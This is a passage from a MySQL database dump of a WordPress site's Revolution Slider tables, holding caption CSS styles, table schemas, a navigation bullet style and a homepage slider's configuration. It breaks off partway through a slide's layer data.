255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(227, 58, 12)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(33,'.tp-caption.medium_bold_orange',NULL,NULL,NULL,'{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(243, 156, 18)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(34,'.tp-caption.medium_bg_orange',NULL,NULL,NULL,'{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(243, 156, 18)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(35,'.tp-caption.grassfloor',NULL,NULL,NULL,'{\"text-decoration\":\"none\",\"background-color\":\"rgba(160, 179, 151, 1)\",\"width\":\"4000px\",\"height\":\"150px\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),(36,'.tp-caption.large_bold_white',NULL,NULL,NULL,'{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(37,'.tp-caption.medium_light_white',NULL,NULL,NULL,'{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(38,'.tp-caption.mediumlarge_light_white',NULL,NULL,NULL,'{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(39,'.tp-caption.mediumlarge_light_white_center',NULL,NULL,NULL,'{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px 0px 0px 0px\",\"text-align\":\"center\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(40,'.tp-caption.medium_bg_asbestos',NULL,NULL,NULL,'{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(127, 140, 141)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(41,'.tp-caption.medium_light_black',NULL,NULL,NULL,'{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(42,'.tp-caption.large_bold_black',NULL,NULL,NULL,'{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(43,'.tp-caption.mediumlarge_light_darkblue',NULL,NULL,NULL,'{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(44,'.tp-caption.small_light_white',NULL,NULL,NULL,'{\"font-size\":\"17px\",\"line-height\":\"28px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(45,'.tp-caption.roundedimage',NULL,NULL,NULL,'{\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),(46,'.tp-caption.large_bg_black',NULL,NULL,NULL,'{\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(0, 0, 0)\",\"padding\":\"10px 20px 15px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(47,'.tp-caption.mediumwhitebg',NULL,NULL,NULL,'{\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(255, 255, 255)\",\"padding\":\"5px 15px 10px\",\"text-shadow\":\"none\",\"border-width\":\"0px\",\"border-color\":\"rgb(0, 0, 0)\",\"border-style\":\"none\"}');
/*!40000 ALTER TABLE `wpev_revslider_css_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_revslider_layer_animations`
--

DROP TABLE IF EXISTS `wpev_revslider_layer_animations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_revslider_layer_animations` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `handle` text NOT NULL,
  `params` text NOT NULL,
  `settings` text DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_revslider_layer_animations`
--

LOCK TABLES `wpev_revslider_layer_animations` WRITE;
/*!40000 ALTER TABLE `wpev_revslider_layer_animations` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_revslider_layer_animations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_revslider_layer_animations_bkp`
--

DROP TABLE IF EXISTS `wpev_revslider_layer_animations_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_revslider_layer_animations_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `handle` text NOT NULL,
  `params` text NOT NULL,
  `settings` text DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_revslider_layer_animations_bkp`
--

LOCK TABLES `wpev_revslider_layer_animations_bkp` WRITE;
/*!40000 ALTER TABLE `wpev_revslider_layer_animations_bkp` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_revslider_layer_animations_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_revslider_navigations`
--

DROP TABLE IF EXISTS `wpev_revslider_navigations`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_revslider_navigations` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `name` varchar(191) NOT NULL,
  `handle` varchar(191) NOT NULL,
  `type` varchar(191) NOT NULL,
  `css` longtext NOT NULL,
  `markup` longtext NOT NULL,
  `settings` longtext DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_revslider_navigations`
--

LOCK TABLES `wpev_revslider_navigations` WRITE;
/*!40000 ALTER TABLE `wpev_revslider_navigations` DISABLE KEYS */;
INSERT INTO `wpev_revslider_navigations` VALUES (1,'Retirio','retirio','bullets','.retirio.tp-bullets {\n}\n.retirio.tp-bullets:before {\n	content:\\\' \\\';\n	position:absolute;\n	width:100%;\n	height:100%;\n	background:transparent;\n	padding:10px;\n	margin-left:-10px;margin-top:-10px;\n	box-sizing:content-box;\n}\n.retirio .tp-bullet {\n	width:34px;\n	height:2px;\n	position:absolute;\n	background:#aaa;\n    background:rgba(125,125,125,0.5);\n	cursor: pointer;\n	box-sizing:content-box;\n}\n.retirio .tp-bullet.rs-touchhover,\n.retirio .tp-bullet.selected {\n	background: #e3b25a;\n}\n.retirio .tp-bullet-image {\n}\n.retirio .tp-bullet-title {\n}\n','\n','{\"dim\":{\"width\":\"160\",\"height\":\"160\"},\"placeholders\":\"\",\"presets\":\"\",\"version\":\"6.0.0\"}');
/*!40000 ALTER TABLE `wpev_revslider_navigations` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_revslider_navigations_bkp`
--

DROP TABLE IF EXISTS `wpev_revslider_navigations_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_revslider_navigations_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `name` varchar(191) NOT NULL,
  `handle` varchar(191) NOT NULL,
  `type` varchar(191) NOT NULL,
  `css` longtext NOT NULL,
  `markup` longtext NOT NULL,
  `settings` longtext DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_revslider_navigations_bkp`
--

LOCK TABLES `wpev_revslider_navigations_bkp` WRITE;
/*!40000 ALTER TABLE `wpev_revslider_navigations_bkp` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_revslider_navigations_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_revslider_sliders`
--

DROP TABLE IF EXISTS `wpev_revslider_sliders`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_revslider_sliders` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `title` tinytext NOT NULL,
  `alias` tinytext DEFAULT NULL,
  `params` longtext NOT NULL,
  `settings` text DEFAULT NULL,
  `type` varchar(191) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `type_index` (`type`(8))
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_revslider_sliders`
--

LOCK TABLES `wpev_revslider_sliders` WRITE;
/*!40000 ALTER TABLE `wpev_revslider_sliders` DISABLE KEYS */;
INSERT INTO `wpev_revslider_sliders` VALUES (1,'Home 1','home-1','{\"addOns\":[],\"version\":\"6.5.25\",\"pakps\":false,\"shortcode\":\"[rev_slider alias=\\\"home-1\\\"][\\/rev_slider]\",\"type\":\"standard\",\"layouttype\":\"fullwidth\",\"sourcetype\":\"gallery\",\"googleFont\":[],\"id\":\"\",\"class\":\"\",\"wrapperclass\":\"\",\"snap\":{\"adjust\":\"none\",\"snap\":false,\"helpLines\":false,\"gap\":20},\"source\":{\"gallery\":[],\"post\":{\"excerptLimit\":55,\"maxPosts\":30,\"fetchType\":\"cat_tag\",\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"post\",\"list\":\"\",\"sortDirection\":\"DESC\",\"subType\":\"post\"},\"woo\":{\"excerptLimit\":55,\"maxProducts\":30,\"featuredOnly\":false,\"inStockOnly\":false,\"category\":\"\",\"sortBy\":\"ID\",\"types\":\"product\",\"sortDirection\":\"DESC\",\"regPriceFrom\":\"\",\"regPriceTo\":\"\",\"salePriceFrom\":\"\",\"salePriceTo\":\"\"},\"instagram\":{\"count\":8,\"hashTag\":\"\",\"transient\":1200,\"type\":\"user\",\"userId\":\"\",\"token_source\":\"account\",\"connect_with\":\"\"},\"facebook\":{\"album\":\"\",\"appId\":\"\",\"appSecret\":\"\",\"count\":8,\"transient\":1200,\"typeSource\":\"timeline\",\"token_source\":\"account\",\"connect_with\":\"\",\"page_id\":\"\"},\"flickr\":{\"apiKey\":\"\",\"count\":8,\"galleryURL\":\"\",\"groupURL\":\"\",\"photoSet\":\"\",\"transient\":1200,\"type\":\"publicphotos\",\"userURL\":\"\"},\"twitter\":{\"accessSecret\":\"\",\"accessToken\":\"\",\"consumerKey\":\"\",\"consumerSecret\":\"\",\"count\":8,\"excludeReplies\":false,\"imageOnly\":false,\"includeRetweets\":false,\"transient\":1200,\"userId\":\"\"},\"vimeo\":{\"albumId\":\"\",\"channelName\":\"\",\"count\":8,\"transient\":1200,\"groupName\":\"\",\"typeSource\":\"user\",\"userName\":\"\"},\"youtube\":{\"api\":\"\",\"channelId\":\"\",\"count\":8,\"playList\":\"\",\"transient\":1200,\"typeSource\":\"channel\"}},\"def\":{\"intelligentInherit\":true,\"autoResponsive\":true,\"responsiveChilds\":true,\"responsiveOffset\":true,\"transition\":\"fade\",\"transitionDuration\":300,\"delay\":\"7000ms\",\"background\":{\"fit\":\"cover\",\"fitX\":100,\"fitY\":100,\"position\":\"center center\",\"positionX\":0,\"positionY\":0,\"repeat\":\"no-repeat\",\"imageSourceType\":\"full\"},\"panZoom\":{\"set\":false,\"blurStart\":0,\"blurEnd\":0,\"duration\":10000,\"ease\":\"none\",\"fitEnd\":100,\"fitStart\":100,\"xEnd\":0,\"yEnd\":0,\"xStart\":0,\"yStart\":0,\"rotateStart\":0,\"rotateEnd\":0}},\"size\":{\"enableUpscaling\":false,\"respectAspectRatio\":false,\"disableForceFullWidth\":false,\"custom\":{\"d\":true,\"n\":true,\"t\":true,\"m\":true},\"minHeightFullScreen\":\"\",\"minHeight\":\"\",\"maxWidth\":0,\"maxHeight\":0,\"fullScreenOffsetContainer\":\"\",\"fullScreenOffset\":\"\",\"width\":{\"d\":\"1200px\",\"n\":1024,\"t\":778,\"m\":480},\"height\":{\"d\":\"820px\",\"n\":\"820px\",\"t\":\"650px\",\"m\":\"650px\"},\"editorCache\":{\"d\":820,\"n\":820,\"t\":650,\"m\":650},\"overflow\":false,\"useFullScreenHeight\":true,\"overflowHidden\":false,\"gridEQModule\":false,\"forceOverflow\":false,\"keepBPHeight\":false,\"ignoreHeightChanges\":true},\"codes\":{\"css\":\"\\/* design text *\\/\\n.ova-stroke-text { \\n  -webkit-text-fill-color: transparent;\\n  -webkit-text-stroke: 1.5px #e3b25a;\\n  font-family: \'Arial\';\\n}\\n\\n\\/* share text*\\/\\n.ova-share-text {\\n   writing-mode: vertical-rl;\\n}\\n\\n\\/* for button hover effect*\\/\\n.rev-btn {\\n  position: relative;\\n}\\n.rev-btn:hover {\\n    transition: all 0.5s ease;\\n    color : #fff !important;\\n}\\n.rev-btn:before {\\n    content: \\\"\\\";\\n    display: block;\\n    position: absolute;\\n    background-color: var(--primary);\\n    width: 8px;\\n    height: 8px;\\n    bottom: 0;\\n    right: 0;\\n    z-index: -1;\\n    transition: all 0.5s ease;\\n}\\n.rev-btn:hover:before {\\n    transition: all 0.5s ease;\\n    width: 100%;\\n    height : 100%;\\n}\",\"javascript\":\"\"},\"carousel\":{\"justify\":false,\"justifyMaxWidth\":false,\"snap\":true,\"borderRadius\":0,\"borderRadiusUnit\":\"px\",\"ease\":\"power3.inOut\",\"fadeOut\":true,\"scale\":false,\"offsetScale\":false,\"horizontal\":\"center\",\"vertical\":\"center\",\"infinity\":false,\"maxItems\":3,\"maxRotation\":0,\"maxOpacity\":100,\"paddingTop\":0,\"paddingBottom\":0,\"rotation\":false,\"scaleDown\":50,\"space\":0,\"speed\":800,\"stretch\":false,\"varyFade\":false,\"varyRotate\":false,\"varyScale\":false,\"showAllLayers\":\"false\"},\"hero\":{\"activeSlide\":-1},\"layout\":{\"bg\":{\"color\":\"transparent\",\"padding\":0,\"dottedOverlay\":\"1\",\"dottedOverlaySize\":\"1\",\"dottedColorA\":\"rgba(0, 0, 0, 0.7)\",\"dottedColorB\":\"rgba(0, 0, 0, 0.7)\",\"shadow\":0,\"useImage\":false,\"image\":\"\",\"imageSourceType\":\"full\",\"fit\":\"cover\",\"position\":\"center center\",\"repeat\":\"no-repeat\"},\"spinner\":{\"color\":\"#e3b25a\",\"type\":\"11\"},\"position\":{\"marginTop\":0,\"marginBottom\":0,\"marginLeft\":0,\"marginRight\":0,\"align\":\"center\",\"fixedOnTop\":false,\"addClear\":false}},\"visibility\":{\"hideSelectedLayersUnderLimit\":\"1280px\",\"hideAllLayersUnderLimit\":0,\"hideSliderUnderLimit\":0},\"general\":{\"slideshow\":{\"slideShow\":true,\"stopOnHover\":false,\"stopSlider\":false,\"stopAfterLoops\":0,\"stopAtSlide\":1,\"shuffle\":false,\"loopSingle\":false,\"viewPort\":false,\"viewPortStart\":\"wait\",\"viewPortArea\":{\"d\":{\"v\":\"200px\",\"e\":false,\"u\":\"\"},\"n\":{\"v\":\"200px\",\"e\":false,\"u\":\"\"},\"t\":{\"v\":\"200px\",\"e\":false,\"u\":\"\"},\"m\":{\"v\":\"200px\",\"e\":false,\"u\":\"\"}},\"presetSliderHeight\":false,\"initDelay\":0,\"waitForInit\":false},\"progressbar\":{\"set\":false,\"alignby\":\"slider\",\"style\":\"horizontal\",\"size\":\"5px\",\"radius\":10,\"vertical\":\"bottom\",\"horizontal\":\"left\",\"x\":0,\"y\":0,\"color\":\"rgba(255,255,255,0.5)\",\"bgcolor\":\"transparent\",\"basedon\":\"slide\",\"gapsize\":0,\"gap\":false,\"gapcolor\":\"rgba(255,255,255,0.5)\",\"reset\":\"reset\",\"visibility\":{\"d\":true,\"m\":true,\"n\":true,\"t\":true}},\"firstSlide\":{\"set\":false,\"duration\":300,\"slotAmount\":7,\"type\":\"fade\",\"alternativeFirstSlideSet\":false,\"alternativeFirstSlide\":1},\"icache\":\"default\",\"DPR\":\"dpr\",\"observeWrap\":false,\"layerSelection\":false,\"lazyLoad\":\"none\",\"nextSlideOnFocus\":false,\"disableFocusListener\":false,\"enableurlhash\":false,\"disableOnMobile\":false,\"autoPlayVideoOnMobile\":true,\"disablePanZoomMobile\":false,\"useWPML\":false,\"perspective\":600,\"perspectiveType\":\"global\"},\"nav\":{\"preview\":{\"width\":50,\"height\":100},\"swipe\":{\"set\":true,\"setOnDesktop\":true,\"setMobileCarousel\":true,\"setDesktopCarousel\":true,\"blockDragVertical\":false,\"direction\":\"horizontal\",\"minTouch\":1,\"velocity\":75},\"keyboard\":{\"direction\":\"horizontal\",\"set\":false},\"mouse\":{\"set\":\"off\",\"reverse\":\"default\",\"viewport\":50,\"calldelay\":1000,\"threshold\":50},\"arrows\":{\"set\":false,\"rtl\":false,\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"style\":\"1000\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778,\"left\":{\"anim\":\"fade\",\"horizontal\":\"left\",\"vertical\":\"center\",\"offsetX\":30,\"offsetY\":0,\"align\":\"slider\"},\"right\":{\"anim\":\"fade\",\"horizontal\":\"right\",\"vertical\":\"center\",\"offsetX\":30,\"offsetY\":0,\"align\":\"slider\"}},\"thumbs\":{\"anim\":\"fade\",\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"set\":false,\"rtl\":false,\"style\":\"2000\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778,\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":5,\"direction\":\"horizontal\",\"height\":50,\"width\":100,\"widthMin\":100,\"innerOuter\":\"inner\",\"offsetX\":0,\"offsetY\":20,\"space\":5,\"align\":\"slider\",\"padding\":5,\"wrapperColor\":\"transparent\",\"mhoffset\":0,\"mvoffset\":0},\"tabs\":{\"anim\":\"fade\",\"animSpeed\":\"1000ms\",\"animDelay\":\"1000ms\",\"set\":false,\"rtl\":false,\"style\":\"4000\",\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778,\"spanWrapper\":false,\"horizontal\":\"center\",\"vertical\":\"bottom\",\"amount\":5,\"direction\":\"horizontal\",\"height\":50,\"width\":100,\"widthMin\":100,\"innerOuter\":\"inner\",\"offsetX\":0,\"offsetY\":20,\"space\":5,\"align\":\"slider\",\"padding\":5,\"wrapperColor\":\"transparent\",\"mhoffset\":0,\"mvoffset\":0},\"bullets\":{\"anim\":\"right\",\"animSpeed\":\"1000ms\",\"animDelay\":\"2000ms\",\"set\":true,\"rtl\":false,\"style\":1,\"preset\":\"default\",\"presets\":[],\"alwaysOn\":true,\"horizontal\":\"right\",\"vertical\":\"bottom\",\"direction\":\"horizontal\",\"offsetX\":\"40px\",\"offsetY\":\"50px\",\"align\":\"slider\",\"space\":\"10\",\"hideDelay\":200,\"hideDelayMobile\":1200,\"hideOver\":false,\"hideOverLimit\":0,\"hideUnder\":false,\"hideUnderLimit\":778}},\"troubleshooting\":{\"alternateImageType\":\"off\",\"alternateURL\":\"\",\"jsNoConflict\":false,\"jsInBody\":false,\"outPutFilter\":\"none\",\"simplify_ie8_ios4\":false},\"parallax\":{\"set\":false,\"setDDD\":false,\"disableOnMobile\":false,\"levels\":[5,10,15,20,25,30,35,40,45,46,47,48,49,50,51,30],\"ddd\":{\"BGFreeze\":false,\"layerOverflow\":false,\"overflow\":false,\"shadow\":false,\"zCorrection\":65},\"mouse\":{\"speed\":0,\"bgSpeed\":0,\"layersSpeed\":0,\"origo\":\"slidercenter\",\"type\":\"scroll\"}},\"modal\":{\"bodyclass\":\"\",\"horizontal\":\"center\",\"vertical\":\"middle\",\"cover\":true,\"allowPageScroll\":false,\"coverColor\":\"rgba(0,0,0,0.5)\",\"coverSpeed\":1000},\"scrolleffects\":{\"set\":false,\"setBlur\":false,\"setFade\":false,\"setGrayScale\":false,\"bg\":false,\"direction\":\"both\",\"layers\":false,\"maxBlur\":10,\"multiplicator\":\"1.3\",\"multiplicatorLayers\":\"1.3\",\"disableOnMobile\":false,\"parallaxLayers\":false,\"staticLayers\":false,\"staticParallaxLayers\":false,\"tilt\":30},\"scrolltimeline\":{\"set\":false,\"fixed\":false,\"fixedStart\":2000,\"fixedEnd\":4000,\"layers\":false,\"ease\":\"none\",\"speed\":500,\"pullcontent\":false},\"skins\":{\"colorsAtStart\":false,\"cid\":2,\"colors\":[{\"alias\":\"Highlight\",\"v\":\"#ff0000\",\"ref\":[]},{\"alias\":\"Headline Text\",\"v\":\"#ffffff\",\"ref\":[]},{\"alias\":\"Content Text\",\"v\":\"#00ffff\",\"ref\":[]}]},\"modalshortcode\":\"[rev_slider usage=\\\"modal\\\" alias=\\\"home-1\\\"][\\/rev_slider]\"}','{\"version\":\"6.5.25\"}','');
/*!40000 ALTER TABLE `wpev_revslider_sliders` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_revslider_sliders_bkp`
--

DROP TABLE IF EXISTS `wpev_revslider_sliders_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_revslider_sliders_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `title` tinytext NOT NULL,
  `alias` tinytext DEFAULT NULL,
  `params` longtext NOT NULL,
  `settings` text DEFAULT NULL,
  `type` varchar(191) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `type_index` (`type`(8))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_revslider_sliders_bkp`
--

LOCK TABLES `wpev_revslider_sliders_bkp` WRITE;
/*!40000 ALTER TABLE `wpev_revslider_sliders_bkp` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_revslider_sliders_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_revslider_slides`
--

DROP TABLE IF EXISTS `wpev_revslider_slides`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_revslider_slides` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `slider_id` int(9) NOT NULL,
  `slide_order` int(11) NOT NULL,
  `params` longtext NOT NULL,
  `layers` longtext NOT NULL,
  `settings` text NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `slider_id_index` (`slider_id`)
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_revslider_slides`
--

LOCK TABLES `wpev_revslider_slides` WRITE;
/*!40000 ALTER TABLE `wpev_revslider_slides` DISABLE KEYS */;
INSERT INTO `wpev_revslider_slides` VALUES (1,1,1,'{\"runtime\":{\"collapsedGroups\":[]},\"bg\":{\"type\":\"image\",\"image\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bg-revslider-home1-01.jpg\",\"imageId\":1708,\"imageLib\":\"medialibrary\",\"imageWidth\":1920,\"imageHeight\":820,\"imageRatio\":2.341463414634146},\"info\":{\"params\":[{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10},{\"v\":\"\",\"l\":10}]},\"attributes\":{\"alt\":\"Architecture & Interior\"},\"slideChange\":{\"speed\":\"900ms\",\"f\":\"random\",\"d\":\"20\",\"in\":{\"o\":0,\"r\":\"{-45,45}\",\"sx\":0,\"sy\":0,\"row\":5,\"col\":5},\"out\":{\"a\":false},\"title\":\"*rotate_left* Scale & Fade\",\"main\":\"boxes\",\"group\":\"rotation\",\"preset\":\"boxrandomrotate\"}}','{\"0\":{\"text\":\"Combines Functionality\\n<span class=\\\"ova-stroke-text\\\" >with style<\\/span>\",\"alias\":\"Title\",\"uid\":0,\"htmltag\":\"h1\",\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"m\":{\"v\":\"90%\",\"e\":true}},\"height\":{\"d\":{\"e\":true}},\"aspectRatio\":{\"d\":{\"v\":\"none\"},\"n\":{\"v\":\"none\"},\"t\":{\"v\":\"none\"},\"m\":{\"v\":\"none\"}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"91px\",\"e\":true},\"n\":{\"v\":\"30px\",\"e\":true},\"t\":{\"v\":\"30px\",\"e\":true},\"m\":{\"v\":\"30px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-37px\",\"e\":true},\"n\":{\"v\":\"20px\",\"e\":true},\"t\":{\"v\":\"50px\",\"e\":true},\"m\":{\"v\":\"50px\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\"}},\"zIndex\":9},\"group\":{\"groupOrder\":9},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"175%\"},\"n\":{\"v\":\"175%\"},\"t\":{\"v\":\"175%\"},\"m\":{\"v\":\"175%\"}},\"opacity\":1},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"-100%\"},\"n\":{\"v\":\"-100%\"},\"t\":{\"v\":\"-100%\"},\"m\":{\"v\":\"-100%\"}}},\"timeline\":{\"endWithSlide\":false,\"alias\":\"Anim From\"}},\"frame_1\":{\"mask\":{\"use\":true},\"timeline\":{\"ease\":\"power3.out\",\"speed\":\"1200\",\"start\":1000,\"endWithSlide\":false,\"alias\":\"Anim 